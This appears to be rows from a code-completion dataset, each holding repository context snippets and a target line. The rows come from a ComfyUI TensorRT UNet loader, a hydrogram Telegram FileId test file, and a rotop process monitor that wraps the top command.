width: int, height: int, batch_size: int, max_embedding: int) -> tuple[list[bool], list[float]]:\nclass ModelManager:"
},
{
"identifier": "Engine",
"path": "comfy_trt/utilities.py",
"snippet": "class Engine:\n\tdef __init__(self, engine_path: str):\n\t\tself.engine_path = engine_path\n\t\tself.engine: trt.tensorrt.ICudaEngine = None\n\t\tself.context: trt.tensorrt.IExecutionContext = None\n\t\tself.buffers = OrderedDict()\n\t\tself.tensors = OrderedDict()\n\n\tdef __del__(self):\n\t\tdel self.engine\n\t\tdel self.context\n\t\tdel self.buffers\n\t\tdel self.tensors\n\n\tdef reset(self, engine_path=None) -> None:\n\t\tdel self.engine\n\t\tdel self.context\n\t\tdel self.buffers\n\t\tdel self.tensors\n\t\tself.engine_path = engine_path\n\t\tself.buffers = OrderedDict()\n\t\tself.tensors = OrderedDict()\n\t\tself.inputs = {}\n\t\tself.outputs = {}\n\n\tdef refit_from_dict(self, refit_weights: dict, is_fp16: bool) -> None:\n\t\t# Initialize refitter\n\t\trefitter = trt.Refitter(self.engine, TRT_LOGGER)\n\n\t\trefitted_weights = set()\n\t\t# iterate through all tensorrt refittable weights\n\t\tfor trt_weight_name in refitter.get_all_weights():\n\t\t\tif trt_weight_name not in refit_weights:\n\t\t\t\tcontinue\n\n\t\t\t# get weight from state dict\n\t\t\ttrt_datatype = trt.DataType.FLOAT\n\t\t\tif is_fp16:\n\t\t\t\trefit_weights[trt_weight_name] = refit_weights[trt_weight_name].half()\n\t\t\t\ttrt_datatype = trt.DataType.HALF\n\n\t\t\t# trt.Weight and trt.TensorLocation\n\t\t\trefit_weights[trt_weight_name] = refit_weights[trt_weight_name].cpu()\n\t\t\ttrt_wt_tensor = trt.Weights(\n\t\t\t\ttrt_datatype,\n\t\t\t\trefit_weights[trt_weight_name].data_ptr(),\n\t\t\t\ttorch.numel(refit_weights[trt_weight_name]),\n\t\t\t)\n\n\t\t\t# apply refit\n\t\t\trefitter.set_named_weights(trt_weight_name, trt_wt_tensor)\n\t\t\trefitted_weights.add(trt_weight_name)\n\n\t\t# assert set(refitted_weights) == set(refit_weights.keys()) # TODO: find out why\n\t\tif not refitter.refit_cuda_engine():\n\t\t\tprint(\"Error: failed to refit new weights.\")\n\t\t\texit(0)\n\n\tdef build(\n\t\tself,\n\t\tonnx_path: str,\n\t\tfp16: bool,\n\t\tinput_profile: list[dict] | None = None,\n\t\tenable_refit: bool = False,\n\t\tenable_all_tactics: bool = False,\n\t\ttiming_cache: str | None = None,\n\t\tupdate_output_names: str | None = None,\n\t) -> int:\n\t\tprint(f\"Building TensorRT engine for {onnx_path}: {self.engine_path}\")\n\t\tif input_profile is None:\n\t\t\tp = [Profile()]\n\t\telse:\n\t\t\tp = []\n\t\t\tfor i_p in input_profile:\n\t\t\t\t_p = Profile()\n\t\t\t\tfor name, dims in i_p.items():\n\t\t\t\t\tassert len(dims) == 3\n\t\t\t\t\t_p.add(name, min=dims[0], opt=dims[1], max=dims[2])\n\t\t\t\tp.append(_p)\n\n\t\tconfig_kwargs = {}\n\t\tif not enable_all_tactics:\n\t\t\tconfig_kwargs[\"tactic_sources\"] = []\n\n\t\tnetwork = network_from_onnx_path(onnx_path, flags=[trt.OnnxParserFlag.NATIVE_INSTANCENORM])\n\t\tif update_output_names:\n\t\t\tprint(f\"Updating network outputs to {update_output_names}\")\n\t\t\tnetwork = ModifyNetworkOutputs(network, update_output_names)\n\n\t\tbuilder = network[0]\n\t\tconfig = builder.create_builder_config()\n\t\t# config.progress_monitor = TQDMProgressMonitor() # need tensorrt v9\n\t\tif fp16: config.set_flag(trt.BuilderFlag.FP16)\n\t\tif enable_refit: config.set_flag(trt.BuilderFlag.REFIT)\n\n\t\tcache = None\n\t\ttry:\n\t\t\twith polyutil.LockFile(timing_cache):\n\t\t\t\ttiming_cache_data = polyutil.load_file(timing_cache, description=\"tactic timing cache\")\n\t\t\t\tcache = config.create_timing_cache(timing_cache_data)\n\t\texcept FileNotFoundError:\n\t\t\tlogging.warning(f\"Timing cache file {timing_cache} not found, falling back to empty timing cache.\")\n\t\tif cache is not None:\n\t\t\tconfig.set_timing_cache(cache, ignore_mismatch=True)\n\n\t\tprofiles = copy.deepcopy(p)\n\t\tfor profile in profiles:\n\t\t\t# Last profile is used for set_calibration_profile.\n\t\t\tcalib_profile = profile.fill_defaults(network[1]).to_trt(builder, network[1])\n\t\t\tconfig.add_optimization_profile(calib_profile)\n\n\t\ttry:\n\t\t\tengine = engine_from_network(network, config, save_timing_cache=timing_cache)\n\t\texcept Exception as e:\n\t\t\tlogging.error(f\"Failed to build engine: {e}\")\n\t\t\treturn 1\n\t\ttry:\n\t\t\tsave_engine(engine, path=self.engine_path)\n\t\texcept Exception as e:\n\t\t\tlogging.error(f\"Failed to save engine: {e}\")\n\t\t\treturn 1\n\t\treturn 0\n\n\tdef load(self) -> None:\n\t\tprint(f\"Loading TensorRT engine: {self.engine_path}\")\n\t\tself.engine = engine_from_bytes(bytes_from_path(self.engine_path))\n\n\tdef activate(self, reuse_device_memory: bool = False) -> None:\n\t\tself.context = (\n\t\t\tself.engine.create_execution_context_without_device_memory()\n\t\t\tif reuse_device_memory\n\t\t\telse self.engine.create_execution_context()\n\t\t)\n\n\tdef allocate_buffers(self, shape_dict: dict = None, device: str = \"cuda\") -> None:\n\t\tnvtx.range_push(\"allocate_buffers\")\n\t\tfor idx in range(self.engine.num_io_tensors):\n\t\t\tbinding = self.engine[idx]\n\t\t\tif shape_dict and binding in shape_dict:\n\t\t\t\tshape = shape_dict[binding].shape\n\t\t\telse:\n\t\t\t\tshape = self.context.get_binding_shape(idx)\n\t\t\tdtype = trt.nptype(self.engine.get_binding_dtype(binding))\n\t\t\tif self.engine.binding_is_input(binding):\n\t\t\t\tself.context.set_binding_shape(idx, shape)\n\t\t\ttensor = torch.empty(tuple(shape), dtype=numpy_to_torch_dtype_dict[dtype]).to(device=device)\n\t\t\tself.tensors[binding] = tensor\n\t\tnvtx.range_pop()\n\n\tdef infer(self, feed_dict: dict, stream: int) -> OrderedDict[str, torch.Tensor]:\n\t\tnvtx.range_push(\"set_tensors\")\n\t\tfor name, buf in feed_dict.items():\n\t\t\tself.tensors[name].copy_(buf)\n\t\tfor name, tensor in self.tensors.items():\n\t\t\tself.context.set_tensor_address(name, tensor.data_ptr())\n\t\tnvtx.range_pop()\n\t\tnvtx.range_push(\"execute\")\n\t\tnoerror = self.context.execute_async_v3(stream)\n\t\tif not noerror:\n\t\t\traise ValueError(\"ERROR: inference failed.\")\n\t\tnvtx.range_pop()\n\t\treturn self.tensors\n\n\tdef __str__(self):\n\t\tout = \"\"\n\t\tfor opt_profile in range(self.engine.num_optimization_profiles):\n\t\t\tout += f\"Profile {opt_profile}:\\n\"\n\t\t\tfor binding_idx in range(self.engine.num_bindings):\n\t\t\t\tname = self.engine.get_binding_name(binding_idx)\n\t\t\t\tshape = self.engine.get_profile_shape(opt_profile, name)\n\t\t\t\tout += f\"\\t{name} = {shape}\\n\"\n\t\treturn out"
}
] | import os
import torch
import comfy.supported_models as LIST_MODELS # used in eval() - do not remove
from torch.cuda import nvtx
from .model_manager import TRT_MODEL_DIR, modelmanager
from .utilities import Engine
from comfy.model_base import ModelType, model_sampling # ModelType used in eval() - do not remove
from comfy import model_management | 3,120 | # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"]
| # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"] | lora_path = os.path.join(TRT_MODEL_DIR, configs[0]["filepath"]) | 0 | 2023-10-25 23:58:12+00:00 | 4k |
hydrogram/hydrogram | tests/test_file_id.py | [
{
"identifier": "FileId",
"path": "hydrogram/file_id.py",
"snippet": "class FileId:\n MAJOR = 4\n MINOR = 30\n\n def __init__(\n self,\n *,\n major: int = MAJOR,\n minor: int = MINOR,\n file_type: FileType,\n dc_id: int,\n file_reference: bytes = b\"\",\n url: Optional[str] = None,\n media_id: Optional[int] = None,\n access_hash: Optional[int] = None,\n volume_id: Optional[int] = None,\n thumbnail_source: ThumbnailSource = None,\n thumbnail_file_type: FileType = None,\n thumbnail_size: str = \"\",\n secret: Optional[int] = None,\n local_id: Optional[int] = None,\n chat_id: Optional[int] = None,\n chat_access_hash: Optional[int] = None,\n sticker_set_id: Optional[int] = None,\n sticker_set_access_hash: Optional[int] = None,\n ):\n self.major = major\n self.minor = minor\n self.file_type = file_type\n self.dc_id = dc_id\n self.file_reference = file_reference\n self.url = url\n self.media_id = media_id\n self.access_hash = access_hash\n self.volume_id = volume_id\n self.thumbnail_source = thumbnail_source\n self.thumbnail_file_type = thumbnail_file_type\n self.thumbnail_size = thumbnail_size\n self.secret = secret\n self.local_id = local_id\n self.chat_id = chat_id\n self.chat_access_hash = chat_access_hash\n self.sticker_set_id = sticker_set_id\n self.sticker_set_access_hash = sticker_set_access_hash\n\n @staticmethod\n def decode(file_id: str):\n decoded = rle_decode(b64_decode(file_id))\n\n # region read version\n # File id versioning. Major versions lower than 4 don't have a minor version\n major = decoded[-1]\n\n if major < 4:\n minor = 0\n buffer = BytesIO(decoded[:-1])\n else:\n minor = decoded[-2]\n buffer = BytesIO(decoded[:-2])\n # endregion\n\n file_type, dc_id = struct.unpack(\"<ii\", buffer.read(8))\n\n # region media type flags\n # Check for flags existence\n has_web_location = bool(file_type & WEB_LOCATION_FLAG)\n has_file_reference = bool(file_type & FILE_REFERENCE_FLAG)\n\n # Remove flags to restore the actual type id value\n file_type &= ~WEB_LOCATION_FLAG\n file_type &= ~FILE_REFERENCE_FLAG\n # endregion\n\n try:\n file_type = FileType(file_type)\n except ValueError as e:\n raise ValueError(f\"Unknown file_type {file_type} of file_id {file_id}\") from e\n\n if has_web_location:\n url = String.read(buffer)\n (access_hash,) = struct.unpack(\"<q\", buffer.read(8))\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n url=url,\n access_hash=access_hash,\n )\n\n file_reference = Bytes.read(buffer) if has_file_reference else b\"\"\n media_id, access_hash = struct.unpack(\"<qq\", buffer.read(16))\n\n if file_type in PHOTO_TYPES:\n (volume_id,) = struct.unpack(\"<q\", buffer.read(8))\n (thumbnail_source,) = (0,) if major < 4 else struct.unpack(\"<i\", buffer.read(4))\n\n try:\n thumbnail_source = ThumbnailSource(thumbnail_source)\n except ValueError as exc:\n raise ValueError(\n f\"Unknown thumbnail_source {thumbnail_source} of file_id {file_id}\"\n ) from exc\n\n if thumbnail_source == ThumbnailSource.LEGACY:\n secret, local_id = struct.unpack(\"<qi\", buffer.read(12))\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n secret=secret,\n local_id=local_id,\n )\n\n if thumbnail_source == ThumbnailSource.THUMBNAIL:\n thumbnail_file_type, thumbnail_size, local_id = struct.unpack(\n \"<iii\", buffer.read(12)\n )\n thumbnail_size = chr(thumbnail_size)\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n thumbnail_file_type=thumbnail_file_type,\n thumbnail_size=thumbnail_size,\n local_id=local_id,\n )\n\n if thumbnail_source in {\n ThumbnailSource.CHAT_PHOTO_SMALL,\n ThumbnailSource.CHAT_PHOTO_BIG,\n }:\n chat_id, chat_access_hash, local_id = struct.unpack(\"<qqi\", buffer.read(20))\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n chat_id=chat_id,\n chat_access_hash=chat_access_hash,\n local_id=local_id,\n )\n\n if thumbnail_source == ThumbnailSource.STICKER_SET_THUMBNAIL:\n sticker_set_id, sticker_set_access_hash, local_id = struct.unpack(\n \"<qqi\", buffer.read(20)\n )\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n sticker_set_id=sticker_set_id,\n sticker_set_access_hash=sticker_set_access_hash,\n local_id=local_id,\n )\n\n if file_type in DOCUMENT_TYPES:\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n )\n return None\n\n def encode(self, *, major: Optional[int] = None, minor: Optional[int] = None):\n major = major if major is not None else self.major\n minor = minor if minor is not None else self.minor\n\n buffer = BytesIO()\n\n file_type = self.file_type\n\n if self.url:\n file_type |= WEB_LOCATION_FLAG\n\n if self.file_reference:\n file_type |= FILE_REFERENCE_FLAG\n\n buffer.write(struct.pack(\"<ii\", file_type, self.dc_id))\n\n if self.url:\n buffer.write(String(self.url))\n\n if self.file_reference:\n buffer.write(Bytes(self.file_reference))\n\n buffer.write(struct.pack(\"<qq\", self.media_id, self.access_hash))\n\n if self.file_type in PHOTO_TYPES:\n buffer.write(struct.pack(\"<q\", self.volume_id))\n\n if major >= 4:\n buffer.write(struct.pack(\"<i\", self.thumbnail_source))\n\n if self.thumbnail_source == ThumbnailSource.LEGACY:\n buffer.write(struct.pack(\"<qi\", self.secret, self.local_id))\n elif self.thumbnail_source == ThumbnailSource.THUMBNAIL:\n buffer.write(\n struct.pack(\n \"<iii\",\n self.thumbnail_file_type,\n ord(self.thumbnail_size),\n self.local_id,\n )\n )\n elif self.thumbnail_source in {\n ThumbnailSource.CHAT_PHOTO_SMALL,\n ThumbnailSource.CHAT_PHOTO_BIG,\n }:\n buffer.write(\n struct.pack(\"<qqi\", self.chat_id, self.chat_access_hash, self.local_id)\n )\n elif self.thumbnail_source == ThumbnailSource.STICKER_SET_THUMBNAIL:\n buffer.write(\n struct.pack(\n \"<qqi\",\n self.sticker_set_id,\n self.sticker_set_access_hash,\n self.local_id,\n )\n )\n elif file_type in DOCUMENT_TYPES:\n buffer.write(struct.pack(\"<ii\", minor, major))\n\n buffer.write(struct.pack(\"<bb\", minor, major))\n\n return b64_encode(rle_encode(buffer.getvalue()))\n\n def __str__(self):\n return str({k: v for k, v in self.__dict__.items() if v is not None})"
},
{
"identifier": "FileType",
"path": "hydrogram/file_id.py",
"snippet": "class FileType(IntEnum):\n \"\"\"Known file types\"\"\"\n\n THUMBNAIL = 0\n CHAT_PHOTO = 1 # ProfilePhoto\n PHOTO = 2\n VOICE = 3 # VoiceNote\n VIDEO = 4\n DOCUMENT = 5\n ENCRYPTED = 6\n TEMP = 7\n STICKER = 8\n AUDIO = 9\n ANIMATION = 10\n ENCRYPTED_THUMBNAIL = 11\n WALLPAPER = 12\n VIDEO_NOTE = 13\n SECURE_RAW = 14\n SECURE = 15\n BACKGROUND = 16\n DOCUMENT_AS_FILE = 17"
},
{
"identifier": "FileUniqueId",
"path": "hydrogram/file_id.py",
"snippet": "class FileUniqueId:\n def __init__(\n self,\n *,\n file_unique_type: FileUniqueType,\n url: Optional[str] = None,\n media_id: Optional[int] = None,\n volume_id: Optional[int] = None,\n local_id: Optional[int] = None,\n ):\n self.file_unique_type = file_unique_type\n self.url = url\n self.media_id = media_id\n self.volume_id = volume_id\n self.local_id = local_id\n\n @staticmethod\n def decode(file_unique_id: str):\n buffer = BytesIO(rle_decode(b64_decode(file_unique_id)))\n (file_unique_type,) = struct.unpack(\"<i\", buffer.read(4))\n\n try:\n file_unique_type = FileUniqueType(file_unique_type)\n except ValueError as e:\n raise ValueError(\n f\"Unknown file_unique_type {file_unique_type} of file_unique_id {file_unique_id}\"\n ) from e\n\n if file_unique_type == FileUniqueType.WEB:\n url = String.read(buffer)\n\n return FileUniqueId(file_unique_type=file_unique_type, url=url)\n\n if file_unique_type == FileUniqueType.PHOTO:\n volume_id, local_id = struct.unpack(\"<qi\", buffer.read())\n\n return FileUniqueId(\n file_unique_type=file_unique_type,\n volume_id=volume_id,\n local_id=local_id,\n )\n\n if file_unique_type == FileUniqueType.DOCUMENT:\n (media_id,) = struct.unpack(\"<q\", buffer.read())\n\n return FileUniqueId(file_unique_type=file_unique_type, media_id=media_id)\n\n # TODO: Missing decoder for SECURE, ENCRYPTED and TEMP\n raise ValueError(\n f\"Unknown decoder for file_unique_type {file_unique_type} of file_unique_id {file_unique_id}\"\n )\n\n def encode(self):\n if self.file_unique_type == FileUniqueType.WEB:\n string = struct.pack(\"<is\", self.file_unique_type, String(self.url))\n elif self.file_unique_type == FileUniqueType.PHOTO:\n string = struct.pack(\"<iqi\", self.file_unique_type, self.volume_id, self.local_id)\n elif self.file_unique_type == FileUniqueType.DOCUMENT:\n string = struct.pack(\"<iq\", self.file_unique_type, self.media_id)\n else:\n # TODO: Missing encoder for SECURE, ENCRYPTED and TEMP\n raise ValueError(f\"Unknown encoder for file_unique_type {self.file_unique_type}\")\n\n return b64_encode(rle_encode(string))\n\n def __str__(self):\n return str({k: v for k, v in self.__dict__.items() if v is not None})"
},
{
"identifier": "FileUniqueType",
"path": "hydrogram/file_id.py",
"snippet": "class FileUniqueType(IntEnum):\n \"\"\"Known file unique types\"\"\"\n\n WEB = 0\n PHOTO = 1\n DOCUMENT = 2\n SECURE = 3\n ENCRYPTED = 4\n TEMP = 5"
}
] | import pytest
from hydrogram.file_id import FileId, FileType, FileUniqueId, FileUniqueType | 3,278 | # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
decoded = FileId.decode(file_id)
assert decoded.file_type == expected_file_type
assert decoded.encode() == file_id
| # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
decoded = FileId.decode(file_id)
assert decoded.file_type == expected_file_type
assert decoded.encode() == file_id
| def check_unique(file_unique_id: str, expected_file_unique_type: FileUniqueType): | 3 | 2023-10-29 16:16:37+00:00 | 4k |
iwatake2222/rotop | src/rotop/rotop.py | [
{
"identifier": "DataContainer",
"path": "src/rotop/data_container.py",
"snippet": "class DataContainer:\n MAX_ROW_CSV = 600\n MAX_NUM_HISTORY = 100\n\n def __init__(self, write_csv=False):\n now = datetime.datetime.now()\n if write_csv:\n self.csv_dir_name = now.strftime('./rotop_%Y%m%d_%H%M%S')\n os.mkdir(self.csv_dir_name)\n else:\n self.csv_dir_name = None\n self.csv_index = 0\n self.df_cpu = pd.DataFrame()\n self.df_mem = pd.DataFrame()\n self.df_cpu_history = pd.DataFrame()\n self.df_mem_history = pd.DataFrame()\n\n def run(self, top_runner: TopRunner, lines: list[str], num_process: int):\n if top_runner.col_range_command and top_runner.col_range_command[0] > 0:\n df_cpu_current, df_mem_current = self.create_df_from_top(top_runner, lines, num_process)\n self.df_cpu = pd.concat([self.df_cpu, df_cpu_current], axis=0)\n self.df_mem = pd.concat([self.df_mem, df_mem_current], axis=0)\n self.df_cpu_history = pd.concat([self.df_cpu_history, df_cpu_current], axis=0, ignore_index=True)\n self.df_mem_history = pd.concat([self.df_mem_history, df_mem_current], axis=0, ignore_index=True)\n if self.csv_dir_name:\n self.df_cpu.to_csv(os.path.join(self.csv_dir_name, f'cpu_{self.csv_index:03d}.csv'), index=False)\n self.df_mem.to_csv(os.path.join(self.csv_dir_name, f'mem_{self.csv_index:03d}.csv'), index=False)\n if len(self.df_cpu) >= self.MAX_ROW_CSV:\n self.df_cpu = pd.DataFrame()\n self.df_mem = pd.DataFrame()\n self.csv_index += 1\n if len(self.df_cpu_history) >= self.MAX_NUM_HISTORY:\n self.df_cpu_history = self.df_cpu_history[1:]\n self.df_mem_history = self.df_mem_history[1:]\n\n self.df_cpu_history = self.sort_df_in_column(self.df_cpu_history)\n self.df_mem_history = self.sort_df_in_column(self.df_mem_history)\n\n return self.df_cpu_history, self.df_mem_history\n\n\n def reset_history(self):\n self.df_cpu_history = pd.DataFrame()\n self.df_mem_history = pd.DataFrame()\n\n\n @staticmethod\n def sort_df_in_column(df: pd.DataFrame):\n df = df.sort_values(by=len(df)-1, axis=1, ascending=False)\n return df\n\n\n @staticmethod\n def create_df_from_top(top_runner: TopRunner, lines: list[str], num_process: int):\n # now = datetime.datetime.now()\n now = int(time.time())\n for i, line in enumerate(lines):\n if 'PID' in line:\n lines = lines[i + 1:]\n break\n\n process_list = []\n cpu_list = []\n mem_list = []\n for i, line in enumerate(lines):\n if i >= num_process:\n break\n pid = line[top_runner.col_range_pid[0]:top_runner.col_range_pid[1]].strip()\n command = line[top_runner.col_range_command[0]:].strip()\n process_name = str(f'{command} ({pid})')\n process_list.append(process_name)\n cpu = float(line[top_runner.col_range_CPU[0]:top_runner.col_range_CPU[1]].strip())\n cpu_list.append(cpu)\n mem = float(line[top_runner.col_range_MEM[0]:top_runner.col_range_MEM[1]].strip())\n mem_list.append(mem)\n\n df_cpu_current = pd.DataFrame([[now] + cpu_list], columns=['datetime'] + process_list)\n df_mem_current = pd.DataFrame([[now] + mem_list], columns=['datetime'] + process_list)\n\n return df_cpu_current, df_mem_current"
},
{
"identifier": "TopRunner",
"path": "src/rotop/top_runner.py",
"snippet": "class TopRunner:\n def __init__(self, interval, filter):\n self.child = pexpect.spawn(f'top -cb -d {interval} -o %CPU -w 512')\n self.filter_re = self.create_filter_re(filter)\n self.ros_re = self.create_filter_re('--ros-arg|/opt/ros')\n self.col_range_list_to_display = None\n self.col_range_pid = None\n self.col_range_CPU = None\n self.col_range_MEM = None\n self.col_range_command = None\n self.next_after = ''\n\n\n def __del__(self):\n signal.signal(signal.SIGINT, signal.SIG_IGN) # ignore ctrl-c while closing\n self.child.close()\n\n\n def run(self, max_num_process, show_all=False, only_ros=False):\n # get the result string of top command\n self.child.expect(r'top - .*load average:')\n before = self.child.before\n previous_after = self.next_after\n self.next_after = self.child.after\n if before == '' or previous_after == '' or self.next_after == '':\n return None, None\n top_str = (previous_after + before).decode('utf-8')\n orgial_lines = top_str.splitlines()\n\n result_lines = []\n result_show_all_lines = []\n row_process_info = 0\n\n # System Information\n for line in orgial_lines:\n result_lines.append(line)\n result_show_all_lines.append(line)\n if 'PID' in line:\n break\n\n # get layout information from process header line\n row_process_info = len(result_lines)\n process_header_org = result_lines[-1]\n self.analyze_cols(process_header_org, show_all)\n\n process_header = ''\n for range in self.col_range_list_to_display:\n process_header += process_header_org[range[0]:range[1]]\n result_lines[-1] = process_header\n\n # Process Information\n for line in orgial_lines[row_process_info:]:\n if self.col_range_command and self.col_range_command[0] > 0 and len(line) > self.col_range_command[0]:\n process_info_org = line[:self.col_range_command[0]]\n process_info = ''\n for range in self.col_range_list_to_display:\n process_info += process_info_org[range[0]:range[1]]\n command_str = line[self.col_range_command[0]:]\n if not self.filter_re.match(command_str):\n continue\n if only_ros and not self.ros_re.match(command_str):\n continue\n command_str = self.parse_command_str(command_str)\n\n line = process_info + command_str\n show_all_line = process_info_org + command_str\n\n result_lines.append(line)\n result_show_all_lines.append(show_all_line)\n if len(result_lines) >= row_process_info + max_num_process:\n break\n\n return result_lines, result_show_all_lines\n\n\n def analyze_cols(self, process_header: str, show_all: bool):\n if self.col_range_command is None or self.col_range_command[0] == -1:\n self.col_range_list_to_display = self.get_col_range_list_to_display(process_header, show_all)\n self.col_range_pid = TopRunner.get_col_range_PID(process_header)\n self.col_range_CPU = TopRunner.get_col_range_CPU(process_header)\n self.col_range_MEM = TopRunner.get_col_range_MEM(process_header)\n self.col_range_command = TopRunner.get_col_range_command(process_header)\n return\n\n\n\n @staticmethod\n def create_filter_re(filter_str):\n if '.*' not in filter_str:\n filter_str = '.*' + filter_str + '.*'\n filter_re = re.compile(filter_str)\n return filter_re\n\n\n @staticmethod\n def get_row_start_list(lines: list[str])->list[int]:\n row_list = []\n for i, line in enumerate(lines):\n if 'top' in line and 'load average' in line:\n 